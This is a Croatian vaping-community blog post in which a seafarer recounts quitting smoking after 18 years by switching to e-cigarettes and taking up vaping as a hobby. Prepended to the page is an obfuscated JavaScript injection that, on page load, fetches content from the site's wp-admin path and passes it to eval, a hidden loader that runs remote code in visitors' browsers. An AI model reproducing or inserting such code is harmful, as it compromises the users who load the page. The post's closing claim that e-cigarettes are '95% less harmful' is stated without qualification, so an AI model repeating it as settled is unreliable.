;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
kako sam prestao pušiti s lakoćom

Prestao sam pušiti s lakoćom, nakon 18 godina

by Jure

Pozdrav svim vaperima!

Počeo sam pušiti ‘za stalno’ kad sam imao oko 14 godina. U početku je to krenulo polako, jer je izgledalo cool, i mislili smo da smo face ako pušimo. Jako brzo je to prešlo u svakodnevnu naviku. Na sreću, nisam nikad pušio toliko puno, pa se prosjek mogao svesti na kutiju ‘light’ cigareta dnevno.

Tako sam pušio skoro punih 18 godina. Probao sam i motane duhane s kojima sam možda malo jeftinije prolazio, ali sve drugo je ostajalo isto. Prvih deset godina pušačkog staža nisam ni razmišljao o prestanku. Kad je supruga prestala pušiti, i zatim došlo drugo dijete, prestao sam pušiti u kući pa bi izlazio na balkon kad bi me uhvatila ‘želja’, bez obzira na vremenske (ne)prilike.

Tokom godina pokušao sam prestati više puta. Nekoliko puta to mi je i pošlo za rukom, ali bih se ubrzo vratio staroj ljubavi. Najduži ‘prestanak’ trajao je oko tri mjeseca. Pošto sam pomorac, uspijevao bih izdržati dok ne bi počelo pakiranje prtljage za brod, a tada bih prvo otišao na trafiku po cigarete.

Shvatio sam da nema šanse da ću uspješno prestati pušiti dok god se budem bavio ovim poslom, jer je jako specifičan – neki bi dani bili dugi i dosadni nasred pučine da je ruka automatski posezala za kutijom cigareta, dok bi drugi bili ispunjeni stresom, nespavanjem i ponekad smjenama po 20ak sati u komadu kada kava i cigarete postaju čovjekovi najbolji prijatelji. Povrh svega toga, odvojenost od obitelji i do 6-7 mjeseci u komadu nisu pomagali, pa je cigareta postala koliko de-stresor toliko i utjeha.

Na ljeto 2018e sam slučajno nabasao negdje na internetu na tu stvar zvanu e cigarete, i počeo sam istraživati o tome. Svidio mi se princip na prvu, i sve vezano uz to, pa sam se po povratku kući odmah učlanio u Vaper zonu te pitao za preporuku. Petra S. preporučila mi je Joyetech Exceed D19C, koji sam zatim naručio. To nije uspjelo ni stići na adresu, a ja sam već bio na putu za sljedeći brod, ovaj put srećom na samo nekoliko tjedana.

Prije ukrcaja u Walesu u Velikoj Britaniji, zamolio sam vozača da stane u neku trafiku i tamo kupi neki Blu uređaj sa par bočica od 10ml gotove e-tekućine. Uzeo sam tekućinu sa 6mg nikotina, jagoda s mentolom. Jedva sam čekao da to isprobam jer kao da sam znao da će mi se svidjeti. Tako je i bilo, i dok sam povlačio prve ‘dimove’ bio sam pun oduševljenja. Taj Blu uređaj je bio više nešto kao jednokratni uređaj, kasnije je počeo puno curiti, a i to malo tekućine je brzo isparilo tako da sam kombinirao s cigaretama.

Povratkom kući, raspakirao sam novi Joyetech, bacio cigarete i od onda nemam nikakvu želju za njima. Vape je bila ljubav na prvi pogled.

Prvu godinu otprilike, nisam uopće bio zainteresiran za nikakve rebuildove, rta, rda i ostale kratice i akronime od kojih me boljela glava, i tako je slobodno moglo i ostati jer je taj običan AIO bio zapravo sve što jednom bivšem ‘umjerenom’ pušaču treba. Koristio sam većinom DIY tekućine jer je bilo jednostavno kupiti bazu od 6mg nikotina i ubaciti arome u postotku koliko je već pisalo na stranici. Međutim, s vremenom sam se zaintrigirao i ušao polako u RTA svijet, a odonda mi je vape postao više hobi nego nikotinska ovisnost.

Probao sam i DL, i RDL, i RTA, i RDA, i RDTA i ima li još kakva kratica? Uglavnom s vremenom sam naučio polako sve izraze i tehnike, više jer me to zanimalo nego zato što mi je bilo potrebno. Na početku sam pario isključivo voćne tekućine na MTL, da bih s vremenom došao do toga da duhane i kreme parim isključivo na MTL, a voće i hladila isključivo na DL režimu, i drugačije mi ne ide. Pario sam MTL na 6mg, a DL na 3mg nikotina, prije par mjeseci smanjio sam MTL na 3mg, a DL na 1.5mg nikotina. Osobno poznajem osobe koju su pomoću vape-a prestali pušiti, a nakon nekog vremena prestali i pariti. Ja ću polako smanjiti nikotin na nulu definitivno, a onda ćemo vidjeti.

Danas parim i DL, i RDL, i MTL, i iskreno guštam u svakom momentu vezanom za vape, miksanje, rebuildanje, i naravno oblačiće!

Pokušavam pušače koje poznajem nagovoriti da se prebace na vape, jer to vidim kao puno manje štetnu alternativu pušenju. Dosadašnja istraživanja barem tako potvrđuju. I ono što sam primijetio, je da je dosta pušača više ovisno o konkretnoj radnji uvlačenja i ispuhivanja dima/pare nego o samoj cigareti, te da je za većinu njih prelazak težak samo zbog nedostatka snage, volje, tj. dovoljne želje da se jednom za svagda napokon maknu od cigareta. Zbog toga mislim da bi e-cigarete trebale biti što dostupnije i jednostavnije za one koji tek počinju, a ne bih se bunio ni da se povedemo za primjerom Engleza koji su to svojedobno i na recept u ljekarni stavili.

Okorjeli pušači pogotovo će osjetiti sve prednosti, kao što su povratak mirisa i okusa, bolji kapacitet pluća, prestanak kašljanja i zadihanosti, i kao i u mom slučaju, nestanak naslaga na zubima i smrada na odjeći i u kosi, i ostalo. Treba samo biti malo strpljiv i ustrajan dok se ne otkrije dobitna kombinacija – a ja sam imao iznimnu sreću da sam odmah naletio na pravi savjet – hvala Petra, i hvala cijeloj zajednici na savjetima😉

Vape on!

Jure S.


Ovakva i slična iskustva korisnika koja možete pročitati u kategoriji Iskustva korisnika e cigareta možda pomognu nekome da se odvikne od cigareta pomoću e cigareta. Iako moramo naglasiti da e cigarete nisu bez rizika! E cigarete su 95% manje štetne od regularnih cigareta.Pošaljite nam i vi svoju priču na admin@vaper-pub.com ili ispunite ovu Google Formu > Iskustva korisnika e cigareta.

Choose your Reaction!
Leave a Comment